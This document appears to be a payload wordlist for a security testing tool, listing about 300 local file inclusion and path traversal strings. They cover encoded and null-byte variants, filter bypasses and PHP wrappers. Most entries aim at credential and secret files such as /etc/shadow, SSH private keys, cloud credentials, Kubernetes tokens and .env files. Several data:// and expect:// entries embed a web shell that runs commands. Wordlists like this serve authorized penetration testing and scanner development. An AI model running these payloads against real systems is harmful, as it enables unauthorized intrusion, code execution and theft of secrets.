# ============================================================================
# WhiteHatHacker AI — LFI/Path Traversal Payload Wordlist (Comprehensive)
# Categories: Linux, Windows, Encoding, Double Encoding, Null Byte,
#             Filter Bypass, Wrapper, Log Poisoning, Proc
# Total: ~300 payloads
# ============================================================================

# --- BASIC LINUX PATH TRAVERSAL ---
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/resolv.conf
/etc/group
/etc/motd
/etc/issue
/etc/os-release
/etc/lsb-release
/etc/crontab
/etc/fstab
/etc/mtab
/etc/syslog.conf
/etc/rsyslog.conf
/etc/environment
/etc/profile
/etc/bashrc
/etc/shells
/etc/security/limits.conf
/etc/security/pam_env.conf
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/httpd/conf/httpd.conf
/etc/mysql/my.cnf
/etc/mysql/mysql.conf.d/mysqld.cnf
/etc/postgresql/*/main/pg_hba.conf
/etc/redis/redis.conf
/etc/php/*/cli/php.ini
/etc/php/*/apache2/php.ini
/etc/php/*/fpm/php.ini

# --- LINUX SENSITIVE FILES ---
../../../proc/self/environ
../../../proc/self/cmdline
../../../proc/self/status
../../../proc/self/fd/0
../../../proc/self/fd/1
../../../proc/self/fd/2
../../../proc/self/maps
../../../proc/self/mounts
../../../proc/self/net/arp
../../../proc/self/net/tcp
../../../proc/self/net/udp
../../../proc/self/cgroup
../../../proc/version
../../../proc/cpuinfo
../../../proc/meminfo
../../../proc/net/fib_trie
../../../proc/net/route
../../../proc/sched_debug

# --- USER FILES ---
../../../home/*/.bash_history
../../../home/*/.bashrc
../../../home/*/.profile
../../../home/*/.ssh/id_rsa
../../../home/*/.ssh/id_rsa.pub
../../../home/*/.ssh/authorized_keys
../../../home/*/.ssh/known_hosts
../../../home/*/.ssh/config
../../../home/*/.gitconfig
../../../home/*/.mysql_history
../../../home/*/.psql_history
../../../root/.bash_history
../../../root/.bashrc
../../../root/.ssh/id_rsa
../../../root/.ssh/authorized_keys

# --- LOG FILES (for log poisoning) ---
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/apache/access.log
../../../var/log/apache/error.log
../../../var/log/httpd/access_log
../../../var/log/httpd/error_log
../../../var/log/nginx/access.log
../../../var/log/nginx/error.log
../../../var/log/syslog
../../../var/log/messages
../../../var/log/auth.log
../../../var/log/secure
../../../var/log/mail.log
../../../var/log/dmesg
../../../var/log/lastlog
../../../var/log/wtmp
../../../var/log/btmp
../../../var/log/faillog
../../../var/log/cron
../../../var/log/daemon.log
../../../var/log/kern.log
../../../var/log/php-fpm.log
../../../var/log/mysql/error.log
../../../var/log/postgresql/postgresql-*-main.log

# --- WINDOWS PATH TRAVERSAL ---
..\..\..\windows\win.ini
..\..\..\..\windows\win.ini
..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\windows\win.ini
..\..\..\windows\system32\config\sam
..\..\..\windows\system32\config\system
..\..\..\windows\system32\config\software
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\system32\license.rtf
..\..\..\windows\repair\sam
..\..\..\windows\repair\system
..\..\..\windows\repair\software
..\..\..\windows\debug\netsetup.log
..\..\..\boot.ini
..\..\..\inetpub\wwwroot\web.config
..\..\..\inetpub\logs\logfiles
..\..\..\windows\php.ini
..\..\..\windows\my.ini
..\..\..\windows\my.cnf
C:\windows\win.ini
C:\windows\system32\drivers\etc\hosts
C:\boot.ini
C:\inetpub\wwwroot\web.config

# --- ENCODING VARIANTS (URL encoding) ---
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd
..%255c..%255c..%255cwindows%255cwin.ini
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%c1%1c..%c1%1c..%c1%1cetc%c1%1cpasswd

# --- DOUBLE ENCODING ---
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
..%25252f..%25252f..%25252fetc%25252fpasswd

# --- NULL BYTE INJECTION ---
../../../etc/passwd%00
../../../etc/passwd%00.html
../../../etc/passwd%00.php
../../../etc/passwd%00.jpg
../../../etc/passwd%00.txt
../../../etc/passwd%2500
../../../etc/passwd\0
../../../etc/passwd\0.php
../../../../etc/passwd%00.png
../../../../etc/passwd%00.pdf

# --- DOT TRUNCATION ---
../../../etc/passwd.......
../../../etc/passwd.............................................................................
../../../etc/passwd/./././././././././././././././././././././././././././././././././././

# --- PHP WRAPPERS (LFI to RCE) ---
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../config.php
php://filter/convert.base64-encode/resource=../../config.php
php://filter/read=convert.base64-encode/resource=/etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
php://filter/read=string.toupper/resource=/etc/passwd
php://filter/convert.iconv.utf-8.utf-16/resource=/etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
php://input
php://stdin
php://memory
php://temp
expect://id
expect://whoami
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
data://text/plain,<?php system($_GET['cmd']); ?>
phar://./evil.phar/test.txt
zip://./evil.zip#test.txt
compress.zlib://./file.gz
compress.bzip2://./file.bz2
glob://*.php

# --- JAVA / TOMCAT SPECIFIC ---
/WEB-INF/web.xml
/WEB-INF/classes/
/META-INF/MANIFEST.MF
../WEB-INF/web.xml
../../WEB-INF/web.xml
../../../WEB-INF/web.xml
/WEB-INF/applicationContext.xml
/WEB-INF/spring-servlet.xml
/WEB-INF/struts-config.xml

# --- NODE.JS / EXPRESS ---
../../../package.json
../../../.env
../../../.env.local
../../../.env.production
../../../.env.development
../../../node_modules/.package-lock.json
../../../yarn.lock
../../../package-lock.json
../../../tsconfig.json
../../../webpack.config.js
../../../.npmrc

# --- PYTHON / DJANGO / FLASK ---
../../../requirements.txt
../../../setup.py
../../../pyproject.toml
../../../manage.py
../../../settings.py
../../../app.py
../../../wsgi.py
../../../.flaskenv

# --- RUBY ON RAILS ---
../../../Gemfile
../../../Gemfile.lock
../../../config/database.yml
../../../config/secrets.yml
../../../config/master.key

# --- DOCKER / CONTAINER ---
../../../.dockerenv
../../../proc/1/cgroup
../../../proc/self/cgroup
../../../../run/secrets/kubernetes.io/serviceaccount/token
../../../../var/run/secrets/kubernetes.io/serviceaccount/ca.crt
../../../../var/run/secrets/kubernetes.io/serviceaccount/namespace

# --- CLOUD METADATA ---
../../../proc/self/environ
/latest/meta-data/
/latest/meta-data/iam/security-credentials/
/latest/user-data

# --- FILTER BYPASS (mixed slashes) ---
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
..../..../..../etc/passwd
....\\....\\....\\windows\\win.ini
../\../\../\etc/passwd
..\/../\../etc/passwd
/var/www/../../etc/passwd
./../../etc/passwd

# --- FILTER BYPASS (path normalization) ---
/etc/./passwd
/etc/../etc/passwd
/etc/passwd/.
/./etc/passwd
/etc//passwd
//etc//passwd
/etc/passwd%0a
/etc/passwd%0d
/etc/passwd%09
/etc/passwd%20
/etc/passwd?
/etc/passwd#
/etc/passwd&

# --- COMMON APP CONFIG FILES ---
../../../.git/config
../../../.git/HEAD
../../../.git/index
../../../.svn/entries
../../../.svn/wc.db
../../../.htaccess
../../../.htpasswd
../../../wp-config.php
../../../configuration.php
../../../config.php
../../../conf/config.ini
../../../database.yml
../../../secrets.yml
../../../credentials.xml
../../../web.xml
../../../applicationContext.xml
../../../.aws/credentials
../../../.aws/config
../../.env
../.env
.env
.env.bak
.env.old
.env.save
../../../.bash_history
../../../.zsh_history

# ============================================================================
# EXPANSION: Advanced LFI ??? PHP Wrappers, Container, Cloud Config
# ============================================================================

# --- Advanced PHP Wrappers ---
php://filter/read=convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
php://filter/read=convert.iconv.utf-8.utf-16/resource=index.php
php://filter/read=convert.iconv.utf-8.utf-16le/resource=index.php
php://filter/convert.base64-encode|convert.base64-decode/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=index.php
php://filter/read=convert.quoted-printable-encode/resource=index.php
php://input
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
expect://id
phar://./test.phar/test.txt
zip://test.zip#test.txt
compress.zlib://file:///etc/passwd

# --- Double/Triple Encoding Traversal ---
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e/%252e%252e/etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%255c..%255c..%255cetc%255cpasswd
%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd

# --- Null Byte + Truncation ---
../../../etc/passwd%00
../../../etc/passwd%00.png
../../../etc/passwd%00.jpg
../../../etc/passwd%2500
../../../etc/passwd%2500.html
....//....//....//etc/passwd
..../..../..../etc/passwd
..;/..;/..;/etc/passwd
..\/..\/..\/etc/passwd

# --- Interesting Linux Files ---
/etc/shadow
/etc/group
/etc/hostname
/etc/hosts
/etc/crontab
/etc/sudoers
/etc/mysql/my.cnf
/etc/postgresql/postgresql.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/ssh/sshd_config
/etc/redis/redis.conf
/etc/mongod.conf
/var/log/auth.log
/var/log/syslog
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/mail.log
/proc/self/environ
/proc/self/cmdline
/proc/self/cwd/index.php
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/maps
/proc/self/mountinfo
/proc/net/tcp
/proc/net/tcp6
/proc/version

# --- Application Config Files ---
/var/www/html/.env
/var/www/html/wp-config.php
/var/www/html/config/database.yml
/var/www/html/config/secrets.yml
/var/www/html/.git/config
/var/www/html/.git/HEAD
/var/www/html/.svn/entries
/var/www/html/WEB-INF/web.xml
/var/www/html/META-INF/context.xml
/var/www/html/composer.json
/var/www/html/package.json
/opt/tomcat/conf/server.xml
/opt/tomcat/conf/tomcat-users.xml

# --- Windows Path Traversal ---
..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\win.ini
..\..\..\..\windows\system.ini
..\..\..\..\inetpub\wwwroot\web.config
..\..\..\..\inetpub\logs\LogFiles\W3SVC1\ex*.log
C:\boot.ini
C:\windows\system32\license.rtf
C:\Users\Administrator\.ssh\id_rsa

# --- Cloud / Container Config ---
/etc/kubernetes/admin.conf
/var/run/secrets/kubernetes.io/serviceaccount/token
/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
/var/run/secrets/kubernetes.io/serviceaccount/namespace
/.dockerenv
/proc/1/cgroup
/run/secrets/
/root/.aws/credentials
/root/.aws/config
/home/*/.aws/credentials
~/.ssh/id_rsa
~/.ssh/id_ed25519
~/.ssh/authorized_keys
~/.bash_history
~/.profile
~/.bashrc
